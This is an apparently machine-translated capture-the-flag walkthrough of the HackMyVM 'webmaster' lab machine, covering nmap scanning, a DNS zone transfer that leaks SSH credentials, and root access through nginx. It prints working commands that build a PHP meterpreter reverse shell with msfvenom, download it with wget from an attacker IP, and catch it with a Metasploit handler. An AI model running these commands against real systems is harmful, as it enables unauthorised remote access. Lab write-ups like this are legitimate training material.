当前位置:网站首页>Hackmyvm target series (1) -webmaster
Hackmyvm target series (1) -webmaster
2022-07-06 14:03:00 【The moon should know my meaning】
One 、 information gathering
First use nmap Scan segments , Detect live hosts , Since there are many campus network hosts, I won't look for them one by one , Use grep Find the target host directly .
nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox
Port scan the target host , Detect target open services
nmap -sT -T4 -sV -O -A -sC -p- 192.168.200.8Scan to three services ,ssh,dns,http

Visit , The discovery is a picture , It roughly means where you keep your password ?Bitwarden and Keepass Baidu is a password management tool . Remember the one below TXT, It's an important reminder .

Use dirsearch Scan the directory .
dirsearch -u http://192.168.200.8 -e php,html,txt,7z,zip,gz,db,bz2,bak -x 404,301,500-599 -t 30However, no useful information was found .

The picture above suggests txt, So try to use wfuzz Blow it up txt file
wfuzz -c --sc=200,302 -w /tools/dict/directory-list-2.3-medium.txt http://192.168.200.8/FUZZ.txtAnd use dirsearch equally , I haven't found any useful news

Then check the page source code , Find a webmaster.hmv, It looks like a domain name . So put it in host File parsing , But it's no use .

Two 、 Exploit
Think of just using nmap Scan to open dns service , Try to use dig Analyze it dns Record
dig axfr @192.168.200.8 webmaster.hmv
#@IP Address Appoint DNS The server 
It's very suspicious to find this thing , It looks like an account and password
john:MyhiddenpazzwordTry signing in ssh, Login successful


Get the first one flag
3、 ... and 、 Elevated privileges
Next is the right raising operation
sudo -lFind out nginx Can be started by any user , And you don't need to enter a password .
By looking at the process , Find out nginx In order to root Permission started .

Then check the root directory of the web page , Anyone who finds the root directory has the permission to delete and write files , Plus nginx In order to root Permission started , We can write shell, Visit this again shell Get permission .
First check the host information , yes 86 Bit

Use msf Create a Trojan
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.200.130 lport=5555 -f raw -o shell.php
Then use on the target machine wget Download the Trojan horse
wget http://192.168.200.130:7890/shell.php
Grant execution permission
chmod +x shell.php
stay msf Start listening on
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set lhost 192.168.200.130
set lport 5555kali Access Trojan files , because nginx yes root Permission to run , Visited shell.php When you file, you get root jurisdiction 
msf Receive session , Permission is root

Get the last one flag

边栏推荐
- Reinforcement learning series (I): basic principles and concepts
- Principles, advantages and disadvantages of two persistence mechanisms RDB and AOF of redis
- 2. First knowledge of C language (2)
- 强化学习基础记录
- [three paradigms of database] you can understand it at a glance
- 7-6 矩阵的局部极小值(PTA程序设计)
- Experiment 4 array
- Canvas foundation 2 - arc - draw arc
- Using qcommonstyle to draw custom form parts
- 实验七 常用类的使用
猜你喜欢

HackMyvm靶机系列(1)-webmaster

Record a penetration of the cat shed from outside to inside. Library operation extraction flag

. How to upload XMIND files to Jinshan document sharing online editing?

HackMyvm靶机系列(5)-warez

Read only error handling

使用Spacedesk实现局域网内任意设备作为电脑拓展屏

.Xmind文件如何上传金山文档共享在线编辑?

HackMyvm靶机系列(4)-vulny

Nuxtjs quick start (nuxt2)

Renforcer les dossiers de base de l'apprentissage
随机推荐
1. First knowledge of C language (1)
中间件漏洞复现—apache
Have you encountered ABA problems? Let's talk about the following in detail, how to avoid ABA problems
实验六 继承和多态
Strengthen basic learning records
实验七 常用类的使用
简述xhr -xhr的基本使用
实验七 常用类的使用(修正帖)
实验五 类和对象
Package bedding of components
Mixlab unbounded community white paper officially released
Simply understand the promise of ES6
7-6 local minimum of matrix (PTA program design)
搭建域环境(win)
7-15 h0161. Find the greatest common divisor and the least common multiple (PTA program design)
1. Preliminary exercises of C language (1)
Read only error handling
Callback function ----------- callback
xray与burp联动 挖掘
QT meta object qmetaobject indexofslot and other functions to obtain class methods attention